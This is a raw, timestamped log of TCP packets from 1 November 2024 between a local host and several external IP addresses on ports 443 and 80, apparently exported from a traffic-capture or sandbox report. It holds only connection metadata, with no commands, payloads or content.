                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.240490913 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.240515947 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.240554094 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.241132975 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.241220951 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.241225004 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.241250992 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.241285086 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.241306067 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.242166996 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.242218018 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.242249966 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.242257118 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.242290020 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.242310047 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.244299889 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.244344950 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.244381905 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.244391918 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.244434118 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.245938063 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.245985031 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.246026039 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.246035099 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.246062040 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.246081114 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.247539997 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.247636080 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.247637987 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.247678995 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.247700930 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.247716904 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.249409914 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.249460936 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.249461889 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.249495983 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.249509096 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.249571085 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.249619007 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.249782085 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.249825001 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.249857903 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.249865055 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.249887943 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.249912024 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.250089884 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.250161886 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.250183105 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.250257969 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.250325918 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.250370026 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.250391960 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.250400066 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.250422955 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.250449896 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.250510931 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.250555992 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.250586987 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.250596046 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.250622034 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.250643015 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.250725985 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.250777006 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.250793934 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.250802040 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.250828981 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.250850916 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.250993967 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.251043081 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.251061916 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.251069069 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.251092911 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.251118898 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.251265049 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.251332998 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.251384020 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.251447916 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.251482964 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.251528978 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.251538992 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.251554966 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.251584053 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.251616955 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.281183004 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.281205893 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.281321049 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.281337023 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.281440020 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350013018 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350069046 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350173950 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350193977 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350208998 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350234985 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350302935 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350344896 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350369930 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350378990 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350399017 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350420952 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350492001 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350542068 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350572109 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350580931 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350608110 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350626945 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.351885080 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.351933002 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.351968050 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.351975918 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.352000952 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.352022886 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.353055000 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.353153944 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.353157997 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.353188038 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.353225946 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.353240013 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.353950977 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.353995085 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.354039907 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.354048014 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.354063988 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.354084015 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.354603052 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.354652882 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.354680061 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.354687929 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.354717016 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.354742050 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.354916096 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.354959011 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.354981899 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.354990005 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.355015993 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.355035067 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.355345964 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.355395079 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.355422020 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.355429888 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.355452061 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.355474949 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.355606079 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.355668068 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.355670929 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.355691910 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.355729103 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.355750084 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.356034994 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.356076002 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.356106043 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.356113911 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.356137037 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.356156111 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.356213093 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.356251001 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.356278896 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.356287956 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.356328964 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.356336117 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.356457949 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.356498957 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.358877897 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.358901024 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.358922005 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.358928919 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:23.078912973 CET4970880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:23.083758116 CET804970854.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:23.084736109 CET4970880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:23.084994078 CET4970880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:23.084994078 CET4970880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:23.089828014 CET804970854.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:23.089838982 CET804970854.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:23.911797047 CET804970854.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:23.955755949 CET4970880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:23.960930109 CET804970854.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:23.961015940 CET4970880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:24.283883095 CET4970980192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:24.289757967 CET804970918.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:24.289858103 CET4970980192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:24.313709974 CET4970980192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:24.313756943 CET4970980192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:24.318592072 CET804970918.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:24.318662882 CET804970918.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:25.732438087 CET804970918.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:25.733375072 CET4970980192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:25.738715887 CET804970918.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:25.738764048 CET4970980192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:25.763896942 CET4971080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:25.769053936 CET804971054.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:25.769124031 CET4971080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:25.769313097 CET4971080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:25.769336939 CET4971080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:25.774833918 CET804971054.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:25.774848938 CET804971054.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:26.609052896 CET804971054.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:26.609258890 CET4971080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:26.614799023 CET804971054.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:26.614907026 CET4971080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:26.824127913 CET4971180192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:26.829021931 CET804971144.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:26.829674006 CET4971180192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:26.829791069 CET4971180192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:26.829807043 CET4971180192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:26.835139036 CET804971144.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:26.835151911 CET804971144.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:27.267967939 CET4971280192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:27.272825003 CET804971254.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:27.272881985 CET4971280192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:27.273194075 CET4971280192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:27.273282051 CET4971280192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:27.277966022 CET804971254.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:27.278083086 CET804971254.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.113450050 CET804971254.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.114844084 CET4971280192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.120987892 CET804971254.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.121037960 CET4971280192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.526943922 CET804971144.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.527168989 CET4971180192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.532788992 CET804971144.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.532943010 CET4971180192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.557456970 CET4971380192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.562385082 CET8049713172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.562448978 CET4971380192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.562653065 CET4971380192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.562680006 CET4971380192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.566246986 CET4971480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.567440987 CET8049713172.234.222.138192.168.2.8
